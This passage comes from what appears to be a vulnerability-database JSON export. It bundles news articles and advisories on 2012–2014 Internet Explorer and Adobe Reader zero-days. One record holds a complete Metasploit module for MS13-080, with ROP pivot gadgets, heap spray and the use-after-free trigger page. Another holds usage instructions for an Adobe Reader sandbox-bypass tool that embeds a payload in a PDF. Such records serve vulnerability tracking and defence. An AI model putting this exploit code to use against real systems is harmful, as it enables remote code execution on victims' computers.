the work principles of antivirus software which makes it different from the other viruses. The malware turns unique for each system and contains a backdoor that allows it to avoid system analytics instruments, and in case the virus is detected, the backdoor stops malicious effects and makes it disappear for the system. \n \n\n\nMiniDuke Malware previously attacked government entities in Belgium, Brazil, Bulgaria, Czech Republic, Georgia, Germany, Hungary, Ireland, Israel, Japan, Latvia, Lebanon, Lithuania, Montenegro, Portugal, Romania, Russian Federation, Slovenia, Spain, Turkey, United Kingdom, United States, including Ukraine.\n", "modified": "2014-04-02T10:00:57", "published": "2014-04-01T23:00:00", "id": "THN:29FFDF713AB47B0B4A5A40C208CF0BEF", "href": "https://thehackernews.com/2014/04/miniduke-malware-spreads-via-fake.html", "type": "thn", "title": "MiniDuke Malware spreads via Fake Ukraine-related Documents", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-01-08T18:01:12", "bulletinFamily": "info", "description": "None\n", "modified": "2013-11-15T16:35:46", "published": "2013-11-15T05:35:00", "id": "THN:1A9D68675814428FB1A1DD8C3778BCF1", "href": "http://thehackernews.com/2013/11/Japanese-Ichitaro-zero-day-vulnerability-CVE-2013-5990.html", "type": "thn", "title": "Japanese word processor 'Ichitaro' zero-day attack discovered in the wild", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-01-08T18:01:26", "bulletinFamily": "info", "description": "[](<http://3.bp.blogspot.com/-MDlArapf444/UOmcXhixB7I/AAAAAAAARW4/1iGFFaP3bBM/s1600/Latest+Internet+Explorer+zero-day+linked+to+Elderwood+Project.png>)\n\nLast week we have seen ongoing attacks was exploiting a vulnerability in [Internet Explorer 6, Internet Explorer 7, and Internet Explorer 8](<http://thehackernews.com/2012/12/internet-explorer-6-7-and-8-vulnerable.html>) that came to light after the [Council on Foreign Relations website was hacked](<http://thehackernews.com/2012/12/chinese-hackers-exploiting-internet.html>) and was hosting the code. Symantec has [linked](<http://www.symantec.com/connect/blogs/elderwood-project-behind-latest-internet-explorer-zero-day-vulnerability>) exploits to the group responsible for a spate of recent espionage attacks Dubbed the \"**_Elderwood Project_**\".\n\n \n\n\nIn May 2012, Amnesty International\u2019s Hong Kong website was compromised &amp; used to serve up a malicious SWF file that exploited CVE-2012-1875, a vulnerability affecting Internet Explorer. A few months later in Sep 2012, the same group behind that attack was responsible for using another IE zero-day CVE-2012-4969.\n\n \n\n\nMicrosoft issued a temporary Fix-it patch for the vulnerability but now researchers are claiming that they have bypassed the patch and were able to compromise a fully patched system. Name comes from a source code variable used by the attackers. In the past, the group has used a mix of spear-phishing emails and watering hole attacks to infect vulnerable systems and has a lengthy history of using zero-day bugs as part of their attacks.\n\n \n\n\nThe group, believed to be based in China, has targeted U.S. defense contractors and their partners in the supply chain, including manufacturers of mechanical components. The latest zero-day was used as part of a so-called \"**_[watering hole](<http://thehackernews.com/2013/01/cfr-watering-hole-attack-also-target.html>)_**\" attack against the website for the policy think tank Council on Foreign Relations, the influential membership group that helps shape U.S. foreign policy.\n\n \n\n\nMicrosoft is working on a full patch for the flaw, which, unfortunately, will not make it in time for next week's Patch Tuesday monthly round of Microsoft updates.\n", "modified": "2013-01-11T18:02:27", "published": "2013-01-06T04:49:00", "id": "THN:A27DF5E371A39A7B4C6BA19A7BD3D4BA", "href": "http://thehackernews.com/2013/01/latest-internet-explorer-zero-day.html", "type": "thn", "title": "Latest Internet Explorer zero-day linked to Elderwood Project", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-01-08T18:01:24", "bulletinFamily": "info", "description": "Today Adobe released a patch for two critical vulnerabilities (CVE-2013-0640 and CVE-2013-0641) that are already being exploited by attackers. Adobe released version 11.0.02 of its Adobe Reader and Adobe Acrobat Pro applications. \n\n \n\n\n[](<http://4.bp.blogspot.com/-UZjVimDYpNU/USVYr6jQ0vI/AAAAAAAAUpg/7yB24pr7A5U/s1600/Patch+released+for+critical+Adobe+vulnerabilities.jpg>)Vulnerabilities affect Adobe Reader and Acrobat XI (11.0.01 and earlier), X (10.1.5 and earlier) and 9.5.3 and earlier for Windows and Mac OS X systems.\n\n \n\n\n\"_These updates address vulnerabilities that could cause a crash and potentially allow an attacker to take control of the affected system_.\" security advisory [reads](<http://www.adobe.com/support/security/bulletins/apsb13-07.html>).\n\n \n\n\nExploits were [discovered](<http://thehackernews.com/2013/02/new-adobe-reader-zero-day-vulnerability_13.html>) by security company FireEye and researchers with antivirus provider Kaspersky Lab have confirmed the exploit can successfully escape the Adobe sandbox.\n\n \n\n\nUsers can update the software through the built-in updater or by downloading a copy of the [Windows](<http://www.adobe.com/support/downloads/product.jsp?product=10&platform=Windows>), [Mac](<http://www.adobe.com/support/downloads/product.jsp?product=10&platform=Macintosh>), or [Linux](<ftp://ftp.adobe.com/pub/adobe/reader/unix/9.x/>) installer directly from Adobe's website. \n", "modified": "2013-02-20T23:14:36", "published": "2013-02-20T12:14:00", "id": "THN:9D18A086B8C1E6B01851C09B70F5A04C", "href": "http://thehackernews.com/2013/02/patch-released-for-critical-adobe.html", "type": "thn", "title": "Patch released for critical Adobe vulnerabilities", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T17:39:39", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2013-09-18T00:00:00", "published": "2013-09-18T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61034", "id": "SSV:61034", "type": "seebug", "title": "Microsoft IE MSHTML\u5185\u5b58\u7834\u574f\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e(CVE-2013-3893)", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T17:47:20", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 57070\r\nCVE(CAN) ID: CVE-2012-4792\r\n\r\nMicrosoft Internet Explorer\u662f\u5fae\u8f6f\u516c\u53f8\u63a8\u51fa\u7684\u4e00\u6b3e\u7f51\u9875\u6d4f\u89c8\u5668\u3002\r\n\r\nInternet Explorer\u5728mshtml!CDwnBindInfo\u5bf9\u8c61\u7684\u5904\u7406\u4e0a\u5b58\u5728\u91ca\u653e\u540e\u91cd\u7528\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u901a\u8fc7\u8bf1\u4f7f\u7528\u6237\u8bbf\u95ee\u6076\u610f\u7f51\u9875\u5185\u5bb9\u5bfc\u81f4\u6267\u884c\u4efb\u610f\u4ee3\u7801\u63a7\u5236\u7528\u6237\u7cfb\u7edf\u3002\r\n\r\n\u6b64\u6f0f\u6d1e\u662f0day\u6f0f\u6d1e\uff0c\u76ee\u524d\u5df2\u88ab\u53d1\u73b0\u7528\u4e8e\u6267\u884c\u9488\u5bf9\u6027\u7684\u653b\u51fb\u3002\r\n\r\n\u4e0d\u53d7\u5f71\u54cd\u7cfb\u7edf\uff1a\r\nMicrosoft Internet Explorer 9.x\r\nMicrosoft Internet Explorer 10.x\n0\nMicrosoft Internet Explorer 8.x\r\nMicrosoft Internet Explorer 7.x\r\nMicrosoft Internet Explorer 6.x\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n\u5982\u679c\u60a8\u4e0d\u80fd\u7acb\u523b\u5b89\u88c5\u8865\u4e01\u6216\u8005\u5347\u7ea7\uff0c\u5efa\u8bae\u60a8\u91c7\u53d6\u4ee5\u4e0b\u63aa\u65bd\u4ee5\u964d\u4f4e\u5a01\u80c1\uff1a\r\n\r\n* \u5728\u5382\u5546\u8865\u4e01\u53d1\u5e03\u4e4b\u524d\uff0c\u6211\u4eec\u5efa\u8bae\u7528\u6237\u6682\u65f6\u6539\u7528\u975eIE\u5185\u6838\u6d4f\u89c8\u5668\uff0c\u5982Firefox\u3001Chrome\u3002\r\n\r\n* \u5347\u7ea7IE\u5230\u7248\u672c9\u621610\uff0c\u56e0\u4e3a\u8fd9\u4e24\u4e2a\u7248\u672c\u7684IE\u4e0d\u53d7\u6b64\u6f0f\u6d1e\u7684\u5f71\u54cd\u3002\r\n\r\n* \u5bf9\u4e8eIE 6\u30017\u30018\u7248\u672c\u6d4f\u89c8\u5668\u53ef\u4ee5\u91c7\u7528\u5982\u4e0b\u9632\u62a4\u63aa\u65bd:\r\n\r\n \u91c7\u7528\u5382\u5546\u63d0\u4f9b\u7684Enhanced Mitigation Experience Toolkit (EMET)\u5de5\u5177\u3002\u6b64\u65b9\u6cd5\u80fd\u6709\u6548\u9632\u8303\uff0c\u4e14\u4e0d\u5f71\u54cd\u6b63\u5e38\u7f51\u7ad9\u7684\u8bbf\u95ee\u3002\r\n \r\n \u589e\u5f3a\u7f13\u89e3\u4f53\u9a8c\u5de5\u5177\u5305\uff08EMET\uff09\u662f\u4e00\u4e2a\u5b9e\u7528\u5de5\u5177\uff0c\u7528\u4e8e\u9632\u6b62\u8f6f\u4ef6\u4e2d\u7684\u6f0f\u6d1e\u88ab\u6210\u529f\u5229\u7528\u3002\r\n \u4ece\u5982\u4e0b\u7f51\u5740\u4e0b\u8f7d\u589e\u5f3a\u7f13\u89e3\u4f53\u9a8c\u5de5\u5177\u5305\uff1a\r\n http://go.microsoft.com/fwlink/?LinkID=200220&amp;clcid=0x409\r\n \r\n \u5b89\u88c5\u4ee5\u540e\u8fd0\u884c\uff0c\u5728\u754c\u9762\u4e2d\u70b9\u51fb\u201cConfigure Apps\u201d\uff0c\u5728\u5bf9\u8bdd\u6846\u4e2d\u70b9\u51fb\u201cAdd\u201d\uff0c\u6d4f\u89c8\u5230IE\u6240\u5728\u7684\u5b89\u88c5\u76ee\u5f55\uff08\u901a\u5e38\u662fc:\\program files\\Internet Explorer\\\uff09\u9009\u62e9 iexplore.exe\uff0c\u70b9\u51fb\u201c\u6253\u5f00\u201d\uff0c IE\u5c31\u88ab\u52a0\u5165\u5230\u53d7\u4fdd\u62a4\u9879\u76ee\u5217\u8868\u4e2d\uff0c\u70b9\u51fb\u201cOK\u201d\uff0c\u5982\u679c\u6709IE\u6b63\u5728\u8fd0\u884c\u7684\u8bdd\u9700\u8981\u91cd\u542f\u4e00\u4e0b\u5e94\u7528\u3002\r\n\r\n \u4e5f\u53ef\u91c7\u7528\u7c7b\u4f3c\u7684\u64cd\u4f5c\u628a\u5176\u4ed6\u7684\u5e94\u7528\u7a0b\u5e8f\u52a0\u5165\u4fdd\u62a4\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\n\u76ee\u524d\u5382\u5546\u8fd8\u6ca1\u6709\u63d0\u4f9b\u8865\u4e01\u6216\u8005\u5347\u7ea7\u7a0b\u5e8f\uff0c\u4f46\u5df2\u7ecf\u53d1\u5e03\u4e86\u9488\u5bf9\u6b64\u6f0f\u6d1e\u7684\u516c\u544a\uff0c\u5efa\u8bae\u7528\u6237\u91c7\u7528\u5382\u5546\u63a8\u8350\u7684\u4e34\u65f6\u89e3\u51b3\u65b9\u6848\u5904\u7406\uff1a\r\n\r\nhttp://technet.microsoft.com/en-us/security/advisory/2794220", "modified": "2012-12-31T00:00:00", "published": "2012-12-31T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60551", "id": "SSV:60551", "title": "Microsoft Internet Explorer 6/7/8 mshtml!CDwnBindInfo\u5bf9\u8c61\u91ca\u653e\u540e\u91cd\u7528\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T14:41:39", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-82516", "id": "SSV:82516", "title": "MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free", "type": "seebug", "sourceData": "\n ##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire &#39;msf/core&#39;\r\n\r\nclass Metasploit3 &#60; Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::RopDb\r\n include Msf::Exploit::Remote::BrowserAutopwn\r\n\r\n autopwn_info({\r\n :ua_name =&#62; HttpClients::IE,\r\n :ua_minver =&#62; &#34;8.0&#34;,\r\n :ua_maxver =&#62; &#34;8.0&#34;,\r\n :javascript =&#62; true,\r\n :os_name =&#62; OperatingSystems::WINDOWS,\r\n :rank =&#62; NormalRanking\r\n })\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n &#39;Name&#39; =&#62; &#34;MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free&#34;,\r\n &#39;Description&#39; =&#62; %q{\r\n This module exploits a vulnerability found in Microsoft Internet Explorer. It was originally\r\n found being exploited in the wild targeting Japanese and Korean IE8 users on Windows XP,\r\n around the same time frame as CVE-2013-3893, except this was kept out of the public eye by\r\n multiple research companies and the vendor until the October patch release.\r\n\r\n This issue is a use-after-free vulnerability in CDisplayPointer via the use of a\r\n &#34;onpropertychange&#34; event handler. To set up the appropriate buggy conditions, we first craft\r\n the DOM tree in a specific order, where a CBlockElement comes after the CTextArea element.\r\n If we use a select() function for the CTextArea element, two important things will happen:\r\n a CDisplayPointer object will be created for CTextArea, and it will also trigger another\r\n event called &#34;onselect&#34;. The &#34;onselect&#34; event will allow us to set up for the actual event\r\n handler we want to abuse - the &#34;onpropertychange&#34; event. Since the CBlockElement is a child\r\n of CTextArea, if we do a node swap of CBlockElement in &#34;onselect&#34;, this will trigger\r\n &#34;onpropertychange&#34;. During &#34;onpropertychange&#34; event handling, a free of the CDisplayPointer\r\n object can be forced by using an &#34;Unslect&#34; (other approaches also apply), but a reference\r\n of this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after\r\n the CDoc::GetLineInfo call, because it is still trying to use that to update\r\n CDisplayPointer&#39;s position. When this invalid reference arrives in QIClassID, a crash\r\n finally occurs due to accessing the freed memory. By controlling this freed memory, it is\r\n possible to achieve arbitrary code execution under the context of the user.\r\n },\r\n &#39;License&#39; =&#62; MSF_LICENSE,\r\n &#39;Author&#39; =&#62;\r\n [\r\n &#39;Unknown&#39;, # Exploit in the wild\r\n &#39;sinn3r&#39; # Metasploit\r\n ],\r\n &#39;References&#39; =&#62;\r\n [\r\n [ &#39;CVE&#39;, &#39;2013-3897&#39; ],\r\n [ &#39;OSVDB&#39;, &#39;98207&#39; ],\r\n [ &#39;MSB&#39;, &#39;MS13-080&#39; ],\r\n [ &#39;URL&#39;, &#39;http://blogs.technet.com/b/srd/archive/2013/10/08/ms13-080-addresses-two-vulnerabilities-under-limited-targeted-attacks.aspx&#39; ],\r\n [ &#39;URL&#39;, &#39;http://jsunpack.jeek.org/?report=847afb154a4e876d61f93404842d9a1b93a774fb&#39; ]\r\n ],\r\n &#39;Platform&#39; =&#62; &#39;win&#39;,\r\n &#39;Targets&#39; =&#62;\r\n [\r\n [ &#39;Automatic&#39;, {} ],\r\n [ &#39;IE 8 on Windows XP SP3&#39;, {} ],\r\n [ &#39;IE 8 on Windows 7&#39;, {} ]\r\n ],\r\n &#39;Payload&#39; =&#62;\r\n {\r\n &#39;BadChars&#39; =&#62; &#34;\\x00&#34;,\r\n &#39;PrependEncoder&#39; =&#62; &#34;\\x81\\xc4\\x0c\\xfe\\xff\\xff&#34; # add esp, -500\r\n },\r\n &#39;DefaultOptions&#39; =&#62;\r\n {\r\n &#39;InitialAutoRunScript&#39; =&#62; &#39;migrate -f&#39;\r\n },\r\n &#39;Privileged&#39; =&#62; false,\r\n # Jsunpack first received a sample to analyze on Sep 12 2013.\r\n # MSFT patched this on Oct 8th.\r\n &#39;DisclosureDate&#39; =&#62; &#34;Oct 08 2013&#34;,\r\n &#39;DefaultTarget&#39; =&#62; 0))\r\n end\r\n\r\n def get_check_html\r\n %Q|&#60;html&#62;\r\n&#60;script&#62;\r\n#{js_os_detect}\r\n\r\nfunction os() {\r\n var detect = window.os_detect.getVersion();\r\n var os_string = detect.os_name + &#34; &#34; + detect.os_flavor + &#34; &#34; + detect.ua_name + &#34; &#34; + detect.ua_version;\r\n return os_string;\r\n}\r\n\r\nfunction dll() {\r\n var checka = 0;\r\n var checkb = 0;\r\n try {\r\n checka = new ActiveXObject(&#34;SharePoint.OpenDocuments.4&#34;);\r\n } catch (e) {}\r\n\r\n try {\r\n checkb = new ActiveXObject(&#34;SharePoint.OpenDocuments.3&#34;);\r\n } catch (e) {}\r\n\r\n if ((typeof checka) == &#34;object&#34; && (typeof checkb) == &#34;object&#34;) {\r\n try{location.href=&#39;ms-help://&#39;} catch(e){}\r\n return &#34;#{@js_office_2010_str}&#34;;\r\n }\r\n else if ((typeof checka) == &#34;number&#34; && (typeof checkb) == &#34;object&#34;) {\r\n try{location.href=&#39;ms-help://&#39;} catch(e){}\r\n return &#34;#{@js_office_2007_str}&#34;;\r\n }\r\n return &#34;#{@js_default_str}&#34;;\r\n}\r\n\r\nwindow.onload = function() {\r\n window.location = &#34;#{get_resource}/search?o=&#34; + escape(os()) + &#34;&d=&#34; + dll();\r\n}\r\n&#60;/script&#62;\r\n&#60;/html&#62;\r\n |\r\n end\r\n\r\n def junk\r\n rand_text_alpha(4).unpack(&#34;V&#34;)[0].to_i\r\n end\r\n\r\n def get_payload(target_info)\r\n rop_payload = &#39;&#39;\r\n os = target_info[:os]\r\n dll_used = &#39;&#39;\r\n\r\n case target_info[:dll]\r\n when @js_office_2007_str\r\n dll_used = &#34;Office 2007&#34;\r\n\r\n pivot =\r\n [\r\n 0x51c2213f, # xchg eax,esp # popad # add byte ptr [eax],al # retn 4\r\n junk, # ESI due to POPAD\r\n junk, # EBP due to POPAD\r\n junk,\r\n junk, # EBX due to POPAD\r\n junk, # EDX due to POPAD\r\n junk, # ECX due to POPAD\r\n 0x51c5d0a7, # EAX due to POPAD (must be writable for the add instruction)\r\n 0x51bd81db, # ROP NOP\r\n junk # Padding for the retn 4 from the stack pivot\r\n ].pack(&#34;V*&#34;)\r\n\r\n rop_payload = generate_rop_payload(&#39;hxds&#39;, payload.encoded, {&#39;target&#39;=&#62;&#39;2007&#39;, &#39;pivot&#39;=&#62;pivot})\r\n\r\n when @js_office_2010_str\r\n dll_used = &#34;Office 2010&#34;\r\n\r\n pivot =\r\n [\r\n 0x51c00e64, # xchg eax, esp; add eax, [eax]; add esp, 10; mov eax,esi; pop esi; pop ebp; retn 4\r\n junk,\r\n junk,\r\n junk,\r\n junk,\r\n junk,\r\n 0x51BE7E9A, # ROP NOP\r\n junk # Padding for the retn 4 from the stack pivot\r\n ].pack(&#34;V*&#34;)\r\n\r\n rop_payload = generate_rop_payload(&#39;hxds&#39;, payload.encoded, {&#39;target&#39;=&#62;&#39;2010&#39;, &#39;pivot&#39;=&#62;pivot})\r\n\r\n when @js_default_str\r\n if target_info[:os] =~ /windows xp/i\r\n # XP uses msvcrt.dll\r\n dll_used = &#34;msvcrt&#34;\r\n\r\n pivot =\r\n [\r\n 0x77C3868A # xchg eax,esp; rcr [ebx-75], 0c1h; pop ebp; ret\r\n ].pack(&#34;V*&#34;)\r\n\r\n rop_payload = generate_rop_payload(&#39;msvcrt&#39;, payload.encoded, {&#39;target&#39;=&#62;&#39;xp&#39;, &#39;pivot&#39;=&#62;pivot})\r\n else\r\n # Assuming this is Win 7, and we&#39;ll use Java 6 ROP\r\n dll_used = &#34;Java&#34;\r\n\r\n pivot =\r\n [\r\n 0x7c342643, # xchg eax,esp # pop edi # add byte ptr [eax],al # pop ecx # retn\r\n junk # Padding for the POP ECX\r\n ].pack(&#34;V*&#34;)\r\n\r\n rop_payload = generate_rop_payload(&#39;java&#39;, payload.encoded, {&#39;pivot&#39;=&#62;pivot})\r\n end\r\n end\r\n\r\n print_status(&#34;Target uses #{os} with #{dll_used} DLL&#34;)\r\n\r\n rop_payload\r\n end\r\n\r\n def get_sploit_html(target_info)\r\n os = target_info[:os]\r\n js_payload = &#39;&#39;\r\n\r\n if os =~ /Windows (7|XP) MSIE 8\\.0/\r\n js_payload = Rex::Text.to_unescape(get_payload(target_info))\r\n else\r\n print_error(&#34;Target not supported by this attack.&#34;)\r\n return &#34;&#34;\r\n end\r\n\r\n %Q|&#60;html&#62;\r\n&#60;head&#62;\r\n&#60;script&#62;\r\n#{js_property_spray}\r\nsprayHeap({shellcode:unescape(&#34;#{js_payload}&#34;)});\r\n\r\nvar earth = document;\r\nvar data = &#34;&#34;;\r\nfor (i=0; i&#60;17; i++) {\r\n if (i==7) { data += unescape(&#34;%u2020%u2030&#34;); }\r\n else { data += &#34;\\\\u4141\\\\u4141&#34;; }\r\n}\r\ndata += &#34;\\\\u4141&#34;;\r\n\r\nfunction butterfly() {\r\n for(i=0; i&#60;20; i++) {\r\n var effect = earth.createElement(&#34;div&#34;);\r\n effect.className = data;\r\n }\r\n}\r\n\r\nfunction kaiju() {\r\n var godzilla = earth.createElement(&#34;textarea&#34;);\r\n var minilla = earth.createElement(&#34;pre&#34;);\r\n earth.body.appendChild(godzilla);\r\n earth.body.appendChild(minilla);\r\n godzilla.appendChild(minilla);\r\n\r\n godzilla.onselect=function(e) {\r\n minilla.swapNode(earth.createElement(&#34;div&#34;));\r\n }\r\n\r\n var battleStation = false;\r\n var war = new Array();\r\n godzilla.onpropertychange=function(e) {\r\n if (battleStation == true) {\r\n for (i=0; i&#60;50; i++) {\r\n war.push(earth.createElement(&#34;span&#34;));\r\n }\r\n }\r\n\r\n earth.execCommand(&#34;Unselect&#34;);\r\n\r\n if (battleStation == true) {\r\n for (i=0; i &#60; war.length; i++) {\r\n war[i].className = data;\r\n }\r\n }\r\n else {\r\n battleStation = true;\r\n }\r\n }\r\n\r\n butterfly();\r\n godzilla.select();\r\n}\r\n&#60;/script&#62;\r\n&#60;/head&#62;\r\n&#60;body onload=&#39;kaiju()&#39;&#62;\r\n&#60;/body&#62;\r\n&#60;/html&#62;\r\n |\r\n end\r\n\r\n\r\n def on_request_uri(cli, request)\r\n if request.uri =~ /search\\?o=(.+)\\&d=(.+)$/\r\n target_info = { :os =&#62; Rex::Text.uri_decode($1), :dll =&#62; Rex::Text.uri_decode($2) }\r\n sploit = get_sploit_html(target_info)\r\n send_response(cli, sploit, {&#39;Content-Type&#39;=&#62;&#39;text/html&#39;, &#39;Cache-Control&#39;=&#62;&#39;no-cache&#39;})\r\n return\r\n end\r\n\r\n html = get_check_html\r\n print_status(&#34;Checking out target...&#34;)\r\n send_response(cli, html, {&#39;Content-Type&#39;=&#62;&#39;text/html&#39;, &#39;Cache-Control&#39;=&#62;&#39;no-cache&#39;})\r\n end\r\n\r\n def exploit\r\n @js_office_2007_str = Rex::Text.rand_text_alpha(4)\r\n @js_office_2010_str = Rex::Text.rand_text_alpha(5)\r\n @js_default_str = Rex::Text.rand_text_alpha(6)\r\n super\r\n end\r\n\r\nend\r\n\r\n\r\n=begin\r\n\r\n+hpa this for debugging or you might not see a crash at all :-)\r\n\r\n0:005&#62; r\r\neax=d6091326 ebx=0777efd4 ecx=00000578 edx=000000c8 esi=043bbfd0 edi=043bbf9c\r\neip=6d6dc123 esp=043bbf7c ebp=043bbfa0 iopl=0 nv up ei pl zr na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\r\nmshtml!QIClassID+0x30:\r\n6d6dc123 8b03 mov eax,dword ptr [ebx] ds:0023:0777efd4=????????\r\n0:005&#62; u\r\nmshtml!QIClassID+0x30:\r\n6d6dc123 8b03 mov eax,dword ptr [ebx]\r\n6d6dc125 8365e800 and dword ptr [ebp-18h],0\r\n6d6dc129 8d4de8 lea ecx,[ebp-18h]\r\n6d6dc12c 51 push ecx\r\n6d6dc12d 6870c16d6d push offset mshtml!IID_IProxyManager (6d6dc170)\r\n6d6dc132 53 push ebx\r\n6d6dc133 bf02400080 mov edi,80004002h\r\n6d6dc138 ff10 call dword ptr [eax]\r\n\r\n=end\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-82516"}, {"lastseen": "2017-11-19T15:56:14", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-83356", "id": "SSV:83356", "title": "Adobe Acrobat Reader - ASLR/DEP Bypass Exploit with SANDBOX BYPASS", "type": "seebug", "sourceData": "\n CVE-2013-0640/1\r\nSomehow, our script got on to the Russian forums :/\r\n\r\n@w3bd3vil and @abh1sek\r\n\r\nExploit-DB mirror: http://www.exploit-db.com/sploits/29881.tar.gz\r\n\r\nAdobe Acrobat Reader ASLR/DEP bypass Exploit with SANDBOX BYPASS\r\n=================================================================\r\n\r\nSupported Adobe Reader Versions:\r\n\r\n* 11.0.1\r\n* 11.0.0\r\n\r\n* 10.1.5\r\n* 10.1.4\r\n* 10.1.3\r\n* 10.1.2\r\n* 10.1\r\n\r\n* 9.5\r\n\r\nTested on:\r\n\r\n* Windows 7 (32 bit)\r\n* Windows 7 (64 bit)\r\n* Windows XP\r\n\r\nScript Requirements:\r\n\r\n* Run on Windows :-)\r\n* Ruby 1.9.x (http://rubyforge.org/frs/download.php/76752/rubyinstaller-1.9.3-p385.exe)\r\n* Gems: origami, metasm (In command prompt type, gem install metasm && gem install origami -v &#34;=1.2.5&#34;)\r\n\r\nFYI:\r\na. It&#39;s a rip, of the original exploit.\r\nb. Works most of the times.\r\nc. We never really got into completing our script options though.\r\n\r\nruby xfa_MAGIC.rb -h\r\nUsage: xfa_MAGIC.rb [options]\r\n -i, --input [FILE] Input PDF. If provided, exploit will be injected into it (optional)\r\n -p, --payload [FILE] PE executable to embed in the payload\r\n --low-mem Use Heap spray suitable for low memory environment\r\n -o, --output [FILE] File path to write output PDF\r\n -h, --help Show help\r\n(Some commands are not supported at the moment)\r\n\r\nruby xfa_MAGIC.rb -p example.exe -o poc.pdf\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-83356"}], "threatpost": [{"lastseen": "2018-10-06T23:01:38", "bulletinFamily": "info", "description": "Expect amped up pressure aimed in Microsoft\u2019s direction for a patch for the Internet Explorer zero day that surfaced last week, now that researchers at Exodus Intelligence reported today they have developed a bypass for the Fix It that Microsoft released as a temporary mitigation.\n\nTheir new exploit beat a fully patched Windows system running IE 8, the same version of the browser exploited by malware used in [watering hole attacks](<https://threatpost.com/council-foreign-relations-website-hit-watering-hole-attack-ie-zero-day-exploit-122912/>) against a number of political and manufacturing websites, including the Council on Foreign Relations in the U.S., and Chinese human rights site Uygur Haber Ajanski.\n\nIE 6 and 7 also hold the same [use-after free memory vulnerability (CVE-2012-4792)](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4792>) but are currently not being exploited. Microsoft said the impact of the attacks is limited; IE 9 and 10 are not vulnerable, Microsoft said. Yesterday\u2019s [Patch Tuesday advisory](<https://threatpost.com/patch-ie-zero-day-wont-be-among-microsoft-security-updates-next-week-010313/>) previewing next Tuesday\u2019s batch of security updates did not include an IE patch.[](<https://threatpost.com/researchers-bypass-microsoft-fix-it-ie-zero-day-010413/>)\n\nBrandon Edwards, VP of Intelligence at Exodus, said his firm\u2019s researchers looked at the Fix It to determine how much of the vulnerability it prevented. \u201cUsually, there are multiple paths one can take to trigger or exploit a vulnerability,\u201d Edwards said. \u201cThe Fix It did not prevent all those paths.\u201d\n\nThe Fix It, according to Microsoft, is an [appcompat shim](<http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx>) that modifies in memory a particular function to always return NULL, resulting in a safe crash of the browser rather than allowing for remote code execution.\n\n\u201cIt comes down to clearly understanding the root cause and ways the browser can get to the affected code,\u201d Edwards said. \u201cThe Fix It covered paths used by the exploit, but not all the ways the vulnerability can be reached. A full patch should eliminate all those possibilities.\u201d\n\nIn the meantime, a handful of political, social and human rights sites in the U.S., Russia, China and Hong Kong have been infected and serving malware, for weeks in some cases, that exploits the IE zero day; as of yesterday, the [Uygur website was still serving an exploit](<https://threatpost.com/ie-zero-day-watering-hole-attack-expands-handful-political-sites-010313/>), researcher and Metaspoloit contributor Eric Romang said.\n\nMicrosoft has been informed of the Exodus Intelligence exploit; researchers at Exodus said they will not disclose details of their exploit until Microsoft addresses the vulnerability.\n\nEarlier this week, Exodus developed what it called a more [advanced exploit of the IE vulnerability](<http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/>), which led them to look more closely at the Fix It. Unlike the original remote code injection exploit, this one does not require a heap spray to execute it. Peter Vreugdenhil said they were able to take advantage of IE8\u2019s support for HTML+TIME, which is no longer supported in more current versions of the browser. The researchers were able to create an array with 